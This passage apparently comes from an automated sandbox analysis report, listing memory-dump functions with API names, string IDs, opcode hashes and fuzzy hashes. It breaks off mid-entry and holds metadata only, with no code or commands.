                                                              • Opcode ID: dcb16c0471cbc006bdee776c2816078cdd894401218ff8aa439196fb6ab9a0c2
                                                              • Instruction ID: 634ff3e6d7e978c34cdec63dd63ef3bf9f9fb58a611a9443a1f9f2536dce21ad
                                                              • Opcode Fuzzy Hash: dcb16c0471cbc006bdee776c2816078cdd894401218ff8aa439196fb6ab9a0c2
                                                              • Instruction Fuzzy Hash: A7112CB6B04205BBFB29CA488D41F5F76BDEF88B54F15806A7A04EF285D6B4DD0086E0
                                                              Function 35A131E1 Relevance: 1.8, APIs: 1, Instructions: 281COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 35A13356
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8
                                                              • String ID:
                                                              • API String ID: 4062629308-0
                                                              • Opcode ID: 1bf32ba30e9874a5817be07ff9f85f31cf47b2d3cafb6be98bdd888a053ef4ba
                                                              • Instruction ID: 88923e048291febe81893f6fe5f7e1cf056d1c1a012759ec244848a43565cea0
                                                              • Opcode Fuzzy Hash: 1bf32ba30e9874a5817be07ff9f85f31cf47b2d3cafb6be98bdd888a053ef4ba
                                                              • Instruction Fuzzy Hash: 39C136B59017198FDB20DF1AC884A99FBF5FF88314F5081AED95EAB250D774AA81DF00
                                                              Function 35941131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 30248845f506f4ce7ef05012ea53e038b8bf2cdbaf7de1cb168bb3aa1dee917a
                                                              • Instruction ID: c97bfd6f8892e1e83bb7770f61b15ddddde22fbd92266ad44f02dd429f377a44
                                                              • Opcode Fuzzy Hash: 30248845f506f4ce7ef05012ea53e038b8bf2cdbaf7de1cb168bb3aa1dee917a
                                                              • Instruction Fuzzy Hash: 74B100B56083808FD355CF28C580A5AFBF1BB88304F544A6EE899DB352D771E945CB82
                                                              Function 35947370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 33e935d1c9612f009ac0a1d4c8bb96771d71d8b9003dc29412122cc8e3fa4227
                                                              • Instruction ID: b78b1698832b9a31c77d2bc319ddf0e8cf887f5dd92a2b5e3ee1ad726d21bb1f
                                                              • Opcode Fuzzy Hash: 33e935d1c9612f009ac0a1d4c8bb96771d71d8b9003dc29412122cc8e3fa4227
                                                              • Instruction Fuzzy Hash: 8BA147B5608345CFD310CF28D880A1ABBFABF88354F10496EE5859B351EB70ED46CB92
                                                              Function 35947703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a934804f272b45e08a4b23a22bc7f562ff649433cf93c47c70b3ff5f4f7c1495
                                                              • Instruction ID: bb9fe43bb058090e11d22325d258d1464fe68bbe4d46b9b1705974ffd7032a39
                                                              • Opcode Fuzzy Hash: a934804f272b45e08a4b23a22bc7f562ff649433cf93c47c70b3ff5f4f7c1495
                                                              • Instruction Fuzzy Hash: E46141B5B04609EFDB18CF78C880A9DFBB6BF88254F14856AD419A7341DB34AD52CBD0
                                                              Function 3597F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b68ffa1611dbeb8961db1e06f69003f04172b93802734bdd6014a5227b675e65
                                                              • Instruction ID: b3aaac3bd78065af188687e61bf9f6109f0eeddd938734960f1f6c755c746575
                                                              • Opcode Fuzzy Hash: b68ffa1611dbeb8961db1e06f69003f04172b93802734bdd6014a5227b675e65
                                                              • Instruction Fuzzy Hash: 304137B49153889EDB10CFA9C880AAEBBF8FF48344F50816EE459A7211DB30A901DF64
                                                              Function 3593B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 70cc30a98fd2f3b6337703f00a3a68c9202e156df540691546479d3ba7553fec
                                                              • Instruction ID: 70ca69067dc4031f10379a21531d4df924a1f1559845b79807a99d3fe59fb099
                                                              • Opcode Fuzzy Hash: 70cc30a98fd2f3b6337703f00a3a68c9202e156df540691546479d3ba7553fec
                                                              • Instruction Fuzzy Hash: C031E076602304EFC711CF18C881A5A77BAFF853A4F504669ED459B292DB31ED42CBE0
                                                              Function 359457C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: dd8c98064019c612f865339f8f2d114e7e68fa43966f43918ddf24a9d5592ef5
                                                              • Instruction ID: b9b1ec2afa20302516408c72cbb6358838d48713f8b0b232895bea6a7c4722e3
                                                              • Opcode Fuzzy Hash: dd8c98064019c612f865339f8f2d114e7e68fa43966f43918ddf24a9d5592ef5
                                                              • Instruction Fuzzy Hash: 94318976715A05AFE745CB68CA80E8ABBB6FF48254F445025EC0187B51DB75EC31CB90
                                                              Function 35943616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: d4f269c33dbc97f38e2a2da130dfb9b17d76bd208dd3444207d6af9a2290d8ca
                                                              • Instruction ID: 221d64af2a81d8e470ef954f47ad842f5b0b3e7efbd06307a0137e13f766cf69
                                                              • Opcode Fuzzy Hash: d4f269c33dbc97f38e2a2da130dfb9b17d76bd208dd3444207d6af9a2290d8ca
                                                              • Instruction Fuzzy Hash: D52122B520A3519FDB21CF24C945F1ABBB9FF88B28F810968E8450B641CB70EC84CBD1
                                                              Function 35A15D50 Relevance: 1.6, APIs: 1, Instructions: 77timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 5cae4d11a6f3ce2a8a4f713c2e0573896b2bc97b54fd696e1426e84efcbdb379
                                                              • Instruction ID: cc90e7931c02d2260528e2fa569b62702bceebc8b648b64ebc8d53a8dcdf7f03
                                                              • Opcode Fuzzy Hash: 5cae4d11a6f3ce2a8a4f713c2e0573896b2bc97b54fd696e1426e84efcbdb379
                                                              • Instruction Fuzzy Hash: D2216B76A00545EFCB12CF18C984E5EBBB2FF49340F1400A0EC015B26ACB35EE15EB90
                                                              Function 3595DDB1 Relevance: 1.6, APIs: 1, Instructions: 62timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 77321fdf408b6883b3b74272b8834c494414fc4fc4caf8a6e77235aae9500516
                                                              • Instruction ID: c41ad1de51e4af9bfbf8f2ddd10d117a8f4d77d2ab6c528f50cd3ce4393bae78
                                                              • Opcode Fuzzy Hash: 77321fdf408b6883b3b74272b8834c494414fc4fc4caf8a6e77235aae9500516
                                                              • Instruction Fuzzy Hash: 5521E1B2704388DFEB12CFA8C440BDDBBB9FF45354F0104A9E9019B692C7799A00C761
                                                              Function 359392FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 77e4a75c3cdf8b75e9e8c234798505a95b58e1b6072e1e1b3be957dad1fa6847
                                                              • Instruction ID: cb133cfd19954115939716fce4f715589519094c9f60fd671afab93ce8c2276c
                                                              • Opcode Fuzzy Hash: 77e4a75c3cdf8b75e9e8c234798505a95b58e1b6072e1e1b3be957dad1fa6847
                                                              • Instruction Fuzzy Hash: CCF0FA72204340AFD731DF09CC05F9BBBFDEF84B50F180518E94293091CAA0B909C660
                                                              Function 35A116A6 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: W
                                                              • API String ID: 0-655174618
                                                              • Opcode ID: c120437e84daec71c0f260311768e34ac1a5c88ca9c568dddc973dcbdd8a3623
                                                              • Instruction ID: 90b9239556ac808049999a1418372b50117b2a82f930aae8b6fc849696c5d57d
                                                              • Opcode Fuzzy Hash: c120437e84daec71c0f260311768e34ac1a5c88ca9c568dddc973dcbdd8a3623
                                                              • Instruction Fuzzy Hash: 01A146B5E007A98FDB20CF24CD80BD9B7B1AB49305F0044EADC59A7241EB34AB81DF90
                                                              Function 3594973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                              • Instruction ID: 74b60df769ee0cc4cb059c04af503fda81aa85e39010d2c25667adbb25c61843
                                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                              • Instruction Fuzzy Hash: B7614EB6D09219AFEF11CFA9C840B9EBBB9FF84754F104169E811BB250D7789E11CB60
                                                              Function 359CF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                              • Instruction ID: f8e8c4a0cb5599c54fb9ad399ab3358a98ad4ddfa941db6fa50ccef9c456f41b
                                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                              • Instruction Fuzzy Hash: EE51ADB2618745AFEB11CF54C840F5BB7F8FB84750F400969B9819B291E7B4ED44CB92
                                                              Function 359FB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: PreferredUILanguages
                                                              • API String ID: 0-1884656846
                                                              • Opcode ID: bda7c7cba0a315298bf80130a9a2ab8fd8e1c70d025f1808b8b97c29de7d6e4c
                                                              • Instruction ID: ad5d2d236fe77ade3313161812f565a42dac0c4a5851a84b7d4dee99440ff75e
                                                              • Opcode Fuzzy Hash: bda7c7cba0a315298bf80130a9a2ab8fd8e1c70d025f1808b8b97c29de7d6e4c
                                                              • Instruction Fuzzy Hash: DF41E476E45219EBDB11CE94C840BEE73BFFF44751F010126E805AB250DAB5EE04C7A0
                                                              Function 359C97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: verifier.dll
                                                              • API String ID: 0-3265496382
                                                              • Opcode ID: ff2c14da856aef35fe0216bafbeff0d47d065b6aacd6e412c545577a8e71e5fc
                                                              • Instruction ID: e6a994d53a2ca46c62deeb3c47d819a2228bf64cdd3a25b749a580e1ec384901
                                                              • Opcode Fuzzy Hash: ff2c14da856aef35fe0216bafbeff0d47d065b6aacd6e412c545577a8e71e5fc
                                                              • Instruction Fuzzy Hash: C331D3B6714302AFEB15CF68D851A2673FDFB48754F9080BAE905DF281EB35AC818791
                                                              Function 35977505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #
                                                              • API String ID: 0-1885708031
                                                              • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                              • Instruction ID: b0f75a2ea923e125ba9ccc20b6814b4b167f66ff68b5ed920b9690f347c92f42
                                                              • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                              • Instruction Fuzzy Hash: 2A41A279A00616EBEF21CF84C890BBEB7B9FF44751F00445AE945A7250DB74E941CBE1
                                                              Function 359736EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Flst
                                                              • API String ID: 0-2374792617
                                                              • Opcode ID: 71693b0b7bfe0b8e773f192abee817fe6427ea87f6d79f73a3ea999304db2c4f
                                                              • Instruction ID: 81c1cb95e181b12317d37c4ea5b2c522242b4c81bcff87bf0c62fa38a4f9ebde
                                                              • Opcode Fuzzy Hash: 71693b0b7bfe0b8e773f192abee817fe6427ea87f6d79f73a3ea999304db2c4f
                                                              • Instruction Fuzzy Hash: F34187B5209301DFE714CF18C480A1ABBE8FF89710F5881AEE4498F241EBB1D942CB91
                                                              Function 35945096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx
                                                              • API String ID: 0-89312691
                                                              • Opcode ID: 54d6a9750ec1d0af7f57c5626247dd6be49785ae2401a032385d8e5e621d6b9e
                                                              • Instruction ID: b4ffb91f60975af47dc3a721388c20894e0258a414cb49e233f8ef50c91908bf
                                                              • Opcode Fuzzy Hash: 54d6a9750ec1d0af7f57c5626247dd6be49785ae2401a032385d8e5e621d6b9e
                                                              • Instruction Fuzzy Hash: 311190FD3097028BF724C999C850626739AFB89364F35852AE459CB391EFB1DC41C781
                                                              Function 359C106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrCreateEnclave
                                                              • API String ID: 0-3262589265
                                                              • Opcode ID: 0b169abfd9b4fa853f9649e65f23e2b24e27c702c6dad7b37c4247ed9f650521
                                                              • Instruction ID: a9e4d3171af3ecb428cd5b910c8b62d89ea45fcb52166ee0144f4a1df0621fdd
                                                              • Opcode Fuzzy Hash: 0b169abfd9b4fa853f9649e65f23e2b24e27c702c6dad7b37c4247ed9f650521
                                                              • Instruction Fuzzy Hash: F02112B1A183849FC310CF1A8805A9BFBE8BBD5B04F404A5FB99097250EBB4D405DB96
                                                              Function 3599739A Relevance: .7, Instructions: 705COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 888b17d21e7d5a7fd7240ecf40a69cc741ca576596652a43f91ac743bd205b98
                                                              • Instruction ID: 68be089a701d0b108cf682c79c7d731fe076f80de5cfa95f0b25c66c705ba5c2
                                                              • Opcode Fuzzy Hash: 888b17d21e7d5a7fd7240ecf40a69cc741ca576596652a43f91ac743bd205b98
                                                              • Instruction Fuzzy Hash: 4242A075A046168FDB18CF59C880AEEB7F6FF8A354F14856DD452AB341DB34E842CBA0
                                                              Function 3596B2C0 Relevance: .6, Instructions: 629COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e88106b466de00a4cbe9cbc766f5cce1a48163e833005d2171dcb4301f737216
                                                              • Instruction ID: 8d528629f316494c57427a30aa0e5bbfb0c3f8c6c443df7e43109a4412acf341
                                                              • Opcode Fuzzy Hash: e88106b466de00a4cbe9cbc766f5cce1a48163e833005d2171dcb4301f737216
                                                              • Instruction Fuzzy Hash: 1A32E4B6E00219DFDF14CF98D890BAEBBB6FF44768F140069E805AB341EB359905CB90
                                                              Function 35A016CC Relevance: .6, Instructions: 571COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
